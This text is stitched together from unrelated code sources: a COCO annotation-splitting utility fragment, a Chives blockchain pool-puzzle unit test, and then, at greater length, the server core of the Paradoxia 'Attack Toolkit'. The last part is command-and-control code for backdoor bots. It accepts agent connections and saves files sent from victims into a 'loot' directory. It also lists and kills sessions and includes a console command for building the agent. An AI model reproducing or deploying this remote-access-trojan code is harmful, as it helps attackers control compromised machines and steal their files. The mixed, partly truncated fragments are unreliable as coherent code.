if len(x) > 13:
return x[:11] + ".."
return x
data = list(
itertools.chain(*[[short_name(class_names[i]), int(v)] for i, v in enumerate(histogram)])
)
total_num_instances = sum(data[1::2])
data.extend([None] * (N_COLS - (len(data) % N_COLS)))
if num_classes > 1:
data.extend(["total", total_num_instances])
data = itertools.zip_longest(*[data[i::N_COLS] for i in range(N_COLS)])
table = tabulate(
data,
headers=["category", "#instances"] * (N_COLS // 2),
tablefmt="pipe",
numalign="left",
stralign="center",
)
    logging.basicConfig(format='[%(asctime)s : %(message)s %(filename)s]',
                        level=logging.INFO)
logging.info('\n' + '\033[92m' + 'Categories and Instances in the ' + file + ':' + '\033[96m' + '\n' + table)
def save_coco(file, images, annotations, categories):
check_instances_categories(file, annotations, [category['name'] for category in categories])
with open(file, 'wt') as coco:
json.dump({'images': images, 'annotations': annotations, 'categories': categories}, coco, indent=2,
sort_keys=False)
def filter_annotations(annotations, images):
image_ids = funcy.lmap(lambda i: int(i['id']), images)
return funcy.lfilter(lambda a: int(a['image_id']) in image_ids, annotations)
def dataset_split(annotation_file, train_val_test, ratio):
with open(annotation_file, 'rt') as annotations:
coco = json.load(annotations)
images = coco['images']
annotations = coco['annotations']
categories = coco['categories']
images_with_annotations = funcy.lmap(lambda a: int(a['image_id']), annotations)
images = funcy.lremove(lambda i: i['id'] not in images_with_annotations, images)
images_trn_val_tst = {}
images_trn_val_tst["train_val"], images_trn_val_tst["test"] = train_test_split(images,
train_size=ratio)
images_trn_val_tst["train"], images_trn_val_tst["val"] = train_test_split(
images_trn_val_tst["train_val"], train_size=ratio)
for set_nms in train_val_test:
img_ids = images_trn_val_tst[set_nms.split('.')[0]]
save_coco(opj(os.path.abspath(os.path.dirname(annotation_file) + os.path.sep + "."), set_nms),
img_ids, filter_annotations(annotations, img_ids),
categories)
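# Illustrative usage sketch (the annotation path and output names are
# hypothetical): split a COCO-format annotation file into train/val/test JSONs
# written next to the source file, using an 80/20 ratio at each split.
def _example_dataset_split():
    dataset_split('annotations/instances.json',
                  ['train.json', 'val.json', 'test.json'], ratio=0.8)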
def check_download_images(imgs_info):
download_error = {}
for num, img_info in enumerate(tqdm(imgs_info)):
image_path = img_info['image_path']
if isinstance(img_info['url'], str):
image_url = [''.join(img_info['url'])]
else:
image_url = img_info['url']
        download_success = False
f_path = os.path.abspath(os.path.dirname(image_path) + os.path.sep + ".")
if os.access(image_path, mode=os.R_OK):
continue
else:
os.makedirs(f_path, exist_ok=True)
for url in image_url:
try:
urllib.request.urlretrieve(url, image_path)
                download_success = True
break
except Exception as e:
continue
        if download_success is False:
download_error[img_info['file_name']] = image_path
continue
img = cv2.imread(image_path, -1)
dim = (img.shape[1], img.shape[0])
dim_origin = (img_info['width'], img_info['height'])
if dim != dim_origin:
            img = cv2.resize(img, dim_origin, interpolation=cv2.INTER_AREA)
cv2.imwrite(image_path, img)
images_with_expired_urls = list(download_error.values())
if len(images_with_expired_urls) != 0:
for img_dir in images_with_expired_urls:
            print('\n' + 'The image " ' + img_dir + ' " does not exist.')
logging.info('\n' + 'You need to download those images by yourself to: ' + f_path + '\n')
else:
logging.info('\n' + 'All the needed images have been downloaded to: ' + f_path + '\n')
# hints: provide with links and tell users which datasets they need to download and where to download them
def check_anno_index(path_to_anno):
with open(path_to_anno) as coco_format_anno:
anno = json.load(coco_format_anno)
annotations = anno['annotations']
categories = anno['categories']
index_start_zero = False
if categories[0]['id'] != 0:
return index_start_zero, anno
else:
index_start_zero = True
for category in categories:
category['id'] += 1
for annotation in annotations:
annotation['category_id'] += 1
anno_sorted_index = {
"images": anno['images'],
"annotations": annotations,
"categories": categories
}
return index_start_zero, anno_sorted_index
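# Illustrative sketch (hypothetical annotation file): categories whose ids
# start at 0 are shifted so ids start from 1, as check_instances_categories
# expects.
def _example_check_anno_index(path='anno_example.json'):
    anno = {
        'images': [{'id': 1}],
        'annotations': [{'image_id': 1, 'category_id': 0}],
        'categories': [{'id': 0, 'name': 'cat'}],
    }
    with open(path, 'w') as f:
        json.dump(anno, f)
    started_at_zero, fixed = check_anno_index(path)
    # started_at_zero is True; fixed['categories'][0]['id'] == 1
    return started_at_zero, fixed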
def checkpoint_verify(work_dir, ckpt_file=None):
if ckpt_file is not None:
ckpt_file = os.path.join(work_dir, ckpt_file)
else:
        for ckpt_file in glob(os.path.join(work_dir, "best_bbox_mAP_epoch_*.pth")):
if os.path.isfile(ckpt_file):
return os.path.abspath(ckpt_file)
ckpt_file = os.path.join(work_dir, "latest.pth")
assert os.path.isfile(ckpt_file), '{} not exist'.format(ckpt_file)
return os.path.abspath(ckpt_file)
def images_categories_distribution(path_to_anno):
"""
    Analyse the image and category distributions of mixed datasets:
    1. draw a pie chart for the image distribution
    2. draw a histogram for the category distribution
    3. .. other, better visualizations and analyses for mixed datasets
    4. could also be used to analyse detection performance on different datasets
    Note: this requires knowing the source dataset of each specific image
"""
pass
def image_from_google_drive(img_info):
"""
    also needs the source dataset of the specific image
"""
pass
|
the-stack_0_19839 | import copy
from typing import List
from unittest import TestCase
from blspy import AugSchemeMPL, G1Element, G2Element, PrivateKey
from chives.types.blockchain_format.program import Program
from chives.types.blockchain_format.sized_bytes import bytes32
from chives.types.blockchain_format.coin import Coin
from chives.types.coin_spend import CoinSpend
from chives.types.spend_bundle import SpendBundle
from chives.util.ints import uint64, uint32
from chives.consensus.default_constants import DEFAULT_CONSTANTS
from chives.wallet.puzzles.p2_delegated_puzzle_or_hidden_puzzle import (
puzzle_for_pk,
solution_for_conditions,
calculate_synthetic_secret_key,
DEFAULT_HIDDEN_PUZZLE_HASH,
)
from chives.wallet.puzzles.p2_conditions import puzzle_for_conditions
from chives.wallet.puzzles import singleton_top_layer
from chives.pools.pool_wallet_info import PoolState
from chives.pools.pool_puzzles import (
create_waiting_room_inner_puzzle,
create_pooling_inner_puzzle,
create_p2_singleton_puzzle,
create_absorb_spend,
create_travel_spend,
get_most_recent_singleton_coin_from_coin_spend,
get_delayed_puz_info_from_launcher_spend,
SINGLETON_MOD_HASH,
launcher_id_to_p2_puzzle_hash,
is_pool_singleton_inner_puzzle,
get_pubkey_from_member_inner_puzzle,
solution_to_pool_state,
uncurry_pool_waitingroom_inner_puzzle,
get_seconds_and_delayed_puzhash_from_p2_singleton_puzzle,
)
from tests.util.key_tool import KeyTool
from tests.clvm.test_puzzles import (
public_key_for_index,
secret_exponent_for_index,
)
from tests.clvm.coin_store import CoinStore, CoinTimestamp, BadSpendBundleError
"""
This test suite aims to test:
- chives.pools.pool_puzzles.py
- chives.wallet.puzzles.pool_member_innerpuz.clvm
- chives.wallet.puzzles.pool_waiting_room_innerpuz.clvm
"""
# Helper function
def sign_delegated_puz(del_puz: Program, coin: Coin) -> G2Element:
synthetic_secret_key: PrivateKey = calculate_synthetic_secret_key(
PrivateKey.from_bytes(
secret_exponent_for_index(1).to_bytes(32, "big"),
),
DEFAULT_HIDDEN_PUZZLE_HASH,
)
return AugSchemeMPL.sign(
synthetic_secret_key,
(del_puz.get_tree_hash() + coin.name() + DEFAULT_CONSTANTS.AGG_SIG_ME_ADDITIONAL_DATA),
)
class TestPoolPuzzles(TestCase):
def test_pool_lifecycle(self):
# START TESTS
# Generate starting info
key_lookup = KeyTool()
sk: PrivateKey = PrivateKey.from_bytes(
secret_exponent_for_index(1).to_bytes(32, "big"),
)
pk: G1Element = G1Element.from_bytes(public_key_for_index(1, key_lookup))
starting_puzzle: Program = puzzle_for_pk(pk)
starting_ph: bytes32 = starting_puzzle.get_tree_hash()
# Get our starting standard coin created
START_AMOUNT: uint64 = 1023
coin_db = CoinStore()
time = CoinTimestamp(10000000, 1)
coin_db.farm_coin(starting_ph, time, START_AMOUNT)
starting_coin: Coin = next(coin_db.all_unspent_coins())
# LAUNCHING
# Create the escaping inner puzzle
GENESIS_CHALLENGE = bytes32.fromhex("ccd5bb71183532bff220ba46c268991a3ff07eb358e8255a65c30a2dce0e5fbb")
launcher_coin = singleton_top_layer.generate_launcher_coin(
starting_coin,
START_AMOUNT,
)
DELAY_TIME = uint64(60800)
DELAY_PH = starting_ph
launcher_id = launcher_coin.name()
relative_lock_height: uint32 = uint32(5000)
# use a dummy pool state
pool_state = PoolState(
owner_pubkey=pk,
pool_url="",
relative_lock_height=relative_lock_height,
state=3, # farming to pool
target_puzzle_hash=starting_ph,
version=1,
)
# create a new dummy pool state for travelling
target_pool_state = PoolState(
owner_pubkey=pk,
pool_url="",
relative_lock_height=relative_lock_height,
state=2, # Leaving pool
target_puzzle_hash=starting_ph,
version=1,
)
# Standard format comment
comment = Program.to([("p", bytes(pool_state)), ("t", DELAY_TIME), ("h", DELAY_PH)])
        pool_wr_innerpuz: Program = create_waiting_room_inner_puzzle(
starting_ph,
relative_lock_height,
pk,
launcher_id,
GENESIS_CHALLENGE,
DELAY_TIME,
DELAY_PH,
)
pool_wr_inner_hash = pool_wr_innerpuz.get_tree_hash()
pooling_innerpuz: Program = create_pooling_inner_puzzle(
starting_ph,
pool_wr_inner_hash,
pk,
launcher_id,
GENESIS_CHALLENGE,
DELAY_TIME,
DELAY_PH,
)
# Driver tests
assert is_pool_singleton_inner_puzzle(pooling_innerpuz)
assert is_pool_singleton_inner_puzzle(pool_wr_innerpuz)
assert get_pubkey_from_member_inner_puzzle(pooling_innerpuz) == pk
# Generating launcher information
conditions, launcher_coinsol = singleton_top_layer.launch_conditions_and_coinsol(
starting_coin, pooling_innerpuz, comment, START_AMOUNT
)
# Creating solution for standard transaction
delegated_puzzle: Program = puzzle_for_conditions(conditions)
full_solution: Program = solution_for_conditions(conditions)
starting_coinsol = CoinSpend(
starting_coin,
starting_puzzle,
full_solution,
)
# Create the spend bundle
sig: G2Element = sign_delegated_puz(delegated_puzzle, starting_coin)
spend_bundle = SpendBundle(
[starting_coinsol, launcher_coinsol],
sig,
)
# Spend it!
coin_db.update_coin_store_for_spend_bundle(
spend_bundle,
time,
DEFAULT_CONSTANTS.MAX_BLOCK_COST_CLVM,
DEFAULT_CONSTANTS.COST_PER_BYTE,
)
# Test that we can retrieve the extra data
assert get_delayed_puz_info_from_launcher_spend(launcher_coinsol) == (DELAY_TIME, DELAY_PH)
assert solution_to_pool_state(launcher_coinsol) == pool_state
# TEST TRAVEL AFTER LAUNCH
# fork the state
fork_coin_db: CoinStore = copy.deepcopy(coin_db)
post_launch_coinsol, _ = create_travel_spend(
launcher_coinsol,
launcher_coin,
pool_state,
target_pool_state,
GENESIS_CHALLENGE,
DELAY_TIME,
DELAY_PH,
)
# Spend it!
fork_coin_db.update_coin_store_for_spend_bundle(
SpendBundle([post_launch_coinsol], G2Element()),
time,
DEFAULT_CONSTANTS.MAX_BLOCK_COST_CLVM,
DEFAULT_CONSTANTS.COST_PER_BYTE,
)
# HONEST ABSORB
time = CoinTimestamp(10000030, 2)
# create the farming reward
p2_singleton_puz: Program = create_p2_singleton_puzzle(
SINGLETON_MOD_HASH,
launcher_id,
DELAY_TIME,
DELAY_PH,
)
p2_singleton_ph: bytes32 = p2_singleton_puz.get_tree_hash()
assert uncurry_pool_waitingroom_inner_puzzle(pool_wr_innerpuz) == (
starting_ph,
relative_lock_height,
pk,
p2_singleton_ph,
)
assert launcher_id_to_p2_puzzle_hash(launcher_id, DELAY_TIME, DELAY_PH) == p2_singleton_ph
assert get_seconds_and_delayed_puzhash_from_p2_singleton_puzzle(p2_singleton_puz) == (DELAY_TIME, DELAY_PH)
coin_db.farm_coin(p2_singleton_ph, time, 1750000000000)
coin_sols: List[CoinSpend] = create_absorb_spend(
launcher_coinsol,
pool_state,
launcher_coin,
            2,  # height
            GENESIS_CHALLENGE,
            DELAY_TIME,
            DELAY_PH,
)
# Spend it!
coin_db.update_coin_store_for_spend_bundle(
SpendBundle(coin_sols, G2Element()),
time,
DEFAULT_CONSTANTS.MAX_BLOCK_COST_CLVM,
DEFAULT_CONSTANTS.COST_PER_BYTE,
)
# ABSORB A NON EXISTENT REWARD (Negative test)
last_coinsol: CoinSpend = list(
filter(
lambda e: e.coin.amount == START_AMOUNT,
coin_sols,
)
)[0]
coin_sols: List[CoinSpend] = create_absorb_spend(
last_coinsol,
pool_state,
launcher_coin,
            2,  # height
            GENESIS_CHALLENGE,
            DELAY_TIME,
            DELAY_PH,
)
# filter for only the singleton solution
singleton_coinsol: CoinSpend = list(
filter(
lambda e: e.coin.amount == START_AMOUNT,
coin_sols,
)
)[0]
# Spend it and hope it fails!
try:
coin_db.update_coin_store_for_spend_bundle(
SpendBundle([singleton_coinsol], G2Element()),
time,
DEFAULT_CONSTANTS.MAX_BLOCK_COST_CLVM,
DEFAULT_CONSTANTS.COST_PER_BYTE,
)
except BadSpendBundleError as e:
assert str(e) == "condition validation failure Err.ASSERT_ANNOUNCE_CONSUMED_FAILED"
# SPEND A NON-REWARD P2_SINGLETON (Negative test)
# create the dummy coin
non_reward_p2_singleton = Coin(
bytes32(32 * b"3"),
p2_singleton_ph,
uint64(1337),
)
coin_db._add_coin_entry(non_reward_p2_singleton, time)
# construct coin solution for the p2_singleton coin
bad_coinsol = CoinSpend(
non_reward_p2_singleton,
p2_singleton_puz,
Program.to(
[
pooling_innerpuz.get_tree_hash(),
non_reward_p2_singleton.name(),
]
),
)
# Spend it and hope it fails!
try:
coin_db.update_coin_store_for_spend_bundle(
SpendBundle([singleton_coinsol, bad_coinsol], G2Element()),
time,
DEFAULT_CONSTANTS.MAX_BLOCK_COST_CLVM,
DEFAULT_CONSTANTS.COST_PER_BYTE,
)
except BadSpendBundleError as e:
assert str(e) == "condition validation failure Err.ASSERT_ANNOUNCE_CONSUMED_FAILED"
# ENTER WAITING ROOM
# find the singleton
singleton = get_most_recent_singleton_coin_from_coin_spend(last_coinsol)
# get the relevant coin solution
travel_coinsol, _ = create_travel_spend(
last_coinsol,
launcher_coin,
pool_state,
target_pool_state,
GENESIS_CHALLENGE,
DELAY_TIME,
DELAY_PH,
)
# Test that we can retrieve the extra data
assert solution_to_pool_state(travel_coinsol) == target_pool_state
# sign the serialized state
data = Program.to(bytes(target_pool_state)).get_tree_hash()
sig: G2Element = AugSchemeMPL.sign(
sk,
(data + singleton.name() + DEFAULT_CONSTANTS.AGG_SIG_ME_ADDITIONAL_DATA),
)
# Spend it!
coin_db.update_coin_store_for_spend_bundle(
SpendBundle([travel_coinsol], sig),
time,
DEFAULT_CONSTANTS.MAX_BLOCK_COST_CLVM,
DEFAULT_CONSTANTS.COST_PER_BYTE,
)
# ESCAPE TOO FAST (Negative test)
# find the singleton
singleton = get_most_recent_singleton_coin_from_coin_spend(travel_coinsol)
# get the relevant coin solution
return_coinsol, _ = create_travel_spend(
travel_coinsol,
launcher_coin,
target_pool_state,
pool_state,
GENESIS_CHALLENGE,
DELAY_TIME,
DELAY_PH,
)
# sign the serialized target state
sig = AugSchemeMPL.sign(
sk,
(data + singleton.name() + DEFAULT_CONSTANTS.AGG_SIG_ME_ADDITIONAL_DATA),
)
# Spend it and hope it fails!
try:
coin_db.update_coin_store_for_spend_bundle(
SpendBundle([return_coinsol], sig),
time,
DEFAULT_CONSTANTS.MAX_BLOCK_COST_CLVM,
DEFAULT_CONSTANTS.COST_PER_BYTE,
)
except BadSpendBundleError as e:
assert str(e) == "condition validation failure Err.ASSERT_HEIGHT_RELATIVE_FAILED"
# ABSORB WHILE IN WAITING ROOM
time = CoinTimestamp(10000060, 3)
# create the farming reward
coin_db.farm_coin(p2_singleton_ph, time, 1750000000000)
# generate relevant coin solutions
coin_sols: List[CoinSpend] = create_absorb_spend(
travel_coinsol,
target_pool_state,
launcher_coin,
            3,  # height
            GENESIS_CHALLENGE,
            DELAY_TIME,
            DELAY_PH,
)
# Spend it!
coin_db.update_coin_store_for_spend_bundle(
SpendBundle(coin_sols, G2Element()),
time,
DEFAULT_CONSTANTS.MAX_BLOCK_COST_CLVM,
DEFAULT_CONSTANTS.COST_PER_BYTE,
)
# LEAVE THE WAITING ROOM
time = CoinTimestamp(20000000, 10000)
# find the singleton
singleton_coinsol: CoinSpend = list(
filter(
lambda e: e.coin.amount == START_AMOUNT,
coin_sols,
)
)[0]
singleton: Coin = get_most_recent_singleton_coin_from_coin_spend(singleton_coinsol)
# get the relevant coin solution
return_coinsol, _ = create_travel_spend(
singleton_coinsol,
launcher_coin,
target_pool_state,
pool_state,
GENESIS_CHALLENGE,
DELAY_TIME,
DELAY_PH,
)
# Test that we can retrieve the extra data
assert solution_to_pool_state(return_coinsol) == pool_state
# sign the serialized target state
data = Program.to([pooling_innerpuz.get_tree_hash(), START_AMOUNT, bytes(pool_state)]).get_tree_hash()
sig: G2Element = AugSchemeMPL.sign(
sk,
(data + singleton.name() + DEFAULT_CONSTANTS.AGG_SIG_ME_ADDITIONAL_DATA),
)
# Spend it!
coin_db.update_coin_store_for_spend_bundle(
SpendBundle([return_coinsol], sig),
time,
DEFAULT_CONSTANTS.MAX_BLOCK_COST_CLVM,
DEFAULT_CONSTANTS.COST_PER_BYTE,
)
# ABSORB ONCE MORE FOR GOOD MEASURE
time = CoinTimestamp(20000000, 10005)
# create the farming reward
coin_db.farm_coin(p2_singleton_ph, time, 1750000000000)
coin_sols: List[CoinSpend] = create_absorb_spend(
return_coinsol,
pool_state,
launcher_coin,
            10005,  # height
            GENESIS_CHALLENGE,
            DELAY_TIME,
            DELAY_PH,
)
# Spend it!
coin_db.update_coin_store_for_spend_bundle(
SpendBundle(coin_sols, G2Element()),
time,
DEFAULT_CONSTANTS.MAX_BLOCK_COST_CLVM,
DEFAULT_CONSTANTS.COST_PER_BYTE,
)
|
the-stack_0_19840 | """
Have a good time reading the source. You are an amazing person.
"""
import socket
import _thread
from .infodb import *
from .session import run_session
import configparser
from os import stat
from os import path
from .builder import create_agent
import os
import subprocess
from kernel.banner import pbanner
from .notif import notify
from colorama import Fore, Style
import colorama
from .scanner import *
import tqdm
colorama.init()
global client, addr
clients = []
oslist = []
iplist = []
wan_ip_list = []
blacklist = []
isSession = False
infodb = configparser.ConfigParser()
settings = configparser.ConfigParser()
try:
settings.read("paradoxia.ini")
server_settings = settings['server']
bot_settings = settings['bot']
except Exception as e:
print(str(e))
exit(True)
def SendData(csocket, data):
csocket = int(csocket)
sockfd = clients[csocket]
try:
sockfd.send(data.encode())
except Exception as error:
clients.remove(sockfd)
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(error))
def SendFData(csocket, data):
csocket = int(csocket)
sockfd = clients[csocket]
try:
sockfd.send(data.encode())
except Exception as error:
clients.remove(sockfd)
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(error))
def SendBytes(csocket, data):
""" Binary File Content is sent without Encryption """
csocket = int(csocket)
sockfd = clients[csocket]
try:
sockfd.send(data)
except Exception as error:
clients.remove(sockfd)
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(error))
def clear():
if(os.name == "nt"):
os.system("cls")
else:
os.system("clear")
def botlist():
return str(len(clients))
def AllBotNames():
if(len(clients) > 0):
        # join every bot name instead of returning on the first loop iteration
        return ", ".join(BOTNAMEONLY(ip) for ip in iplist)
else:
return "-"
def broadcast(data):
try:
for i in clients:
i.send(data.encode())
except Exception as error:
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(error))
def ReceiveThread(ip, port, csocket, wanip, operating_system):
"""
This function runs in a Thread and receives data
from the client.
"""
def clearLists():
try:
clients.remove(csocket)
iplist.remove(ip)
wan_ip_list.remove(wanip)
oslist.remove(operating_system)
except ValueError:
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Socket not in list.")
while(True):
try:
def uniquify(path):
"""
Credits : https://stackoverflow.com/questions/13852700/create-file-but-if-name-exists-add-number/57896232#57896232
"""
filename, extension = os.path.splitext(path)
counter = 1
while os.path.exists(path):
path = filename + " (" + str(counter) + ")" + extension
counter += 1
return path
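            # e.g. uniquify("loot/pass.txt") -> "loot/pass (1).txt" when the file already exists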
response = csocket.recv(1024).decode()
if(not response):
clearLists()
print("[!] BOT disconnected.")
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online Bots : " + str(len(clients)))
break
if(response.startswith("savethis")):
print("\n[+] Incoming file..")
fpath = "loot/"+BOTNAMEONLY(wanip).replace("/", "-")
try:
os.mkdir(fpath)
except FileExistsError:
pass
except Exception as e:
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error : " + str(e))
try:
f = response.split("=")
csocket.settimeout(10)
try:
full_file = uniquify(fpath+"/"+f[1])
with open(full_file, "wb") as received_file:
data = csocket.recv(4096)
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Downloading file '{fl}' in '{fd}'".format(fl=f[1], fd=full_file))
while(data):
received_file.write(data)
data = csocket.recv(4096)
if not data: break
except socket.timeout:
csocket.settimeout(None)
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Downloaded file '"+f[1] +"'.")
try:
sa = stat(full_file)
print(
"\nOriginal Filename : {filename}\nSize : {size} bytes\nSaved in : '{fp}'".format(
filename = f[1],
size = str(sa.st_size),
fp = str(path.dirname(path.abspath(fpath+"/"+f[1])))
)
)
except FileNotFoundError:
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] File not Downloaded.")
except IndexError:
print("Error.")
else:
# if(isSession == True):
#print(str(response))
# else:
print("\n["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL +"] "+ip+":"+port+" -\n" + str(response))
except UnicodeDecodeError as ude:
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Unicode Decode error : " + str(ude))
except UnicodeEncodeError as eEe:
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Unicode Encode error : " + str(eEe))
        except ConnectionAbortedError as cAe:
            # cAe : Connection Aborted Error :v
            clearLists()
            print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occurred : " + str(cAe))
            print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online Bots : " + str(len(clients)))
            break
        except ConnectionError as cE:
            # cE : Connection Error :'v
            clearLists()
            print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occurred : " + str(cE))
            print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online Bots : " + str(len(clients)))
            break
        except ConnectionRefusedError as cRe:
            # cRe : Connection Refused Error ;'v
            clearLists()
            print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occurred : " + str(cRe))
            print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online Bots : " + str(len(clients)))
            break
        except ConnectionResetError as cRetwo:
            clearLists()
            print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occurred : " + str(cRetwo))
            print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online Bots : " + str(len(clients)))
            break
        except socket.error as se:
            # for sockfd in clients:
            #     clients.remove(sockfd)
            clearLists()
            print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occurred : " + str(se))
            print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online Bots : " + str(len(clients)))
            break
        except Exception as recv_error:
            clearLists()
            print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occurred : " + str(recv_error))
            print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online Bots : " + str(len(clients)))
            break
def MainServer():
"""
This is the main server where backdoors connect
"""
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
server.setsockopt(socket.SOL_TCP, socket.TCP_KEEPIDLE, 1)
server.setsockopt(socket.SOL_TCP, socket.TCP_KEEPINTVL, 1)
server.setsockopt(socket.SOL_TCP, socket.TCP_KEEPCNT, 5)
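    # TCP keepalive: start probing after 1s of idle, probe every 1s, and drop the
    # connection after 5 failed probes, so dead bots are detected quickly.
    # (SOL_TCP/TCP_KEEPIDLE are Linux-specific; this block would need guarding on
    # Windows/macOS.)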
host = server_settings['host']
port = int(server_settings['port'])
blist = open("blacklist", "r")
bl_ips = blist.readlines()
for i in range(len(bl_ips)):
if("#" in bl_ips[i]):
pass
else:
blacklist.append(bl_ips[i])
try:
server.bind((host, port))
except PermissionError:
print("["+Style.BRIGHT + Fore.LIGHTYELLOW_EX + "^" + Style.RESET_ALL + "] Run as sudo.")
exit(True)
except Exception as i:
raise i
try:
server.listen(5)
#print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] TCP Server running. ({host}:{port})".format(host=host, port=server_settings['port']))
except KeyboardInterrupt:
print(" Keyboard Interrupt, Exit.")
exit()
except Exception as errunknown:
print(str(errunknown))
while(True):
client, addr = server.accept()
if(addr[0] in blacklist):
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] New Connection form blacklisted IP " + str(addr[0]) +":"+ str(addr[1]))
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Connection Closed.")
client.shutdown(socket.SHUT_RDWR)
client.close()
break
clients.append(client)
iplist.append(str(addr[0]))
if(bot_settings['verbose'] == "True"):
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] New connection from " + str(addr[0]) +":"+ str(addr[1]))
try:
pw = bot_settings['password']
if(bot_settings['verbose'] == "True"):
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Sending Password : "+pw + " ..")
client.send(pw.encode())
client.settimeout(10)
try:
# Set 10 seconds timeout to wait for client
pwInfo = client.recv(1024).decode()
if(pwInfo.startswith("INCORRENT PASSWORD.")):
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] " + pwInfo + ". Password Rejected by Agent.")
clients.remove(client)
iplist.remove(str(addr[0]))
break
except socket.timeout:
client.settimeout(None)
print("\n[+] Timed out, Client did not send a Response.")
print("\n[+] Forwarding to Scanner {ip}:{port}..".format(ip=str(addr[0]), port=str(addr[1])))
scan_ip(addr[0])
client.shutdown(socket.SHUT_RDWR)
client.close()
clients.remove(client)
iplist.remove(addr[0])
break
client.settimeout(None)
if(bot_settings['verbose'] == "True"):
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] " + pwInfo)
# Receive Wan ip for file name
client.send("wanip".encode())
wanip = client.recv(1024).decode()
client.send("os".encode())
os = client.recv(1024).decode()
wan_ip_list.append(wanip)
oslist.append(os)
except ConnectionResetError as cRe:
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] ERROR : " + str(cRe) + ". Most likely password was rejected.")
clients.remove(client)
iplist.remove(str(addr[0]))
oslist.remove(os)
except ConnectionAbortedError as cAe:
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] ERROR : " + str(cAe) + ". Most likely password was rejected.")
clients.remove(client)
iplist.remove(str(addr[0]))
oslist.remove(os)
if(wanip.startswith(("No"))):
filename = "bots/"+str(addr[0])
else:
filename = "bots/"+str(wanip)
if(bot_settings['verbose'] == "True"):
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Getting information..")
SaveInformation(client, filename)
notify(str(addr[0]), str(addr[1]), str(len(clients)))
# default
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] " + str(addr[0])+":"+str(addr[1])+ " is online.")
_thread.start_new_thread(ReceiveThread, (str(addr[0]), str(addr[1]), client, wanip, os,))
def console():
def list_bots():
print("\nActive Sessions (" + str(len(clients)) +")")
print("===================================")
try:
if(len(clients) > 0):
for i in range(len(iplist)):
print(
"\n[ SESSION ID : "+str(i) +" ][ Connection : "+iplist[i] + " ][ WAN : "+wan_ip_list[i] +" ][ OPERATING SYSTEM : " + oslist[i] + " ]"
)
except Exception as stre:
print("Error : " + str(stre))
_thread.start_new_thread(MainServer, ())
while(True):
try:
command = input("paradoxia> ")
args = command.split()
if(command == "help"):
print(
"""
HELP
-------------
~ Console Commands :
---------------------------
+ list/sessions - List online clients.
+ settings - View settings.
+ session - Interact with a Client.
- USAGE : session <session id>
+ kill - Kill a connection.
- USAGE : kill <session id>
+ blacklist - Blacklist an IP address.
- USAGE : blacklist <ip>
+ bytecheck - (Misc) Check the size of a string.
                  - (NOTE : Added for cryptographic testing; mainly useful for the developer, not end users.)
+ botinfo - View information of a Connection BOT/Client.
+ banner - Print banner.
+ build lhost=<lhost> lport=<lport> - Build the agent.
+ exit - Exit.
PARADOXIA Attack Toolkit
Created by : QuantumCore (Fahad)
Github : https://github.com/quantumcore
Official Repository : https://github.com/quantumcored/paradoxia
Discord Server : https://discordapp.com/invite/8snh7nx
"""
)
elif(command.startswith("blacklist")):
try:
bargs = command.split()
if(len(bargs[1]) > 0):
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Blacklisting IP : {ip}.\n |_ View file 'blacklist' to allow.".format(ip = bargs[1]))
with open("blacklist", "a+") as blacklist:
blacklist.write("\n"+bargs[1])
else:
print("USAGE : blacklist < ip > ")
except FileNotFoundError:
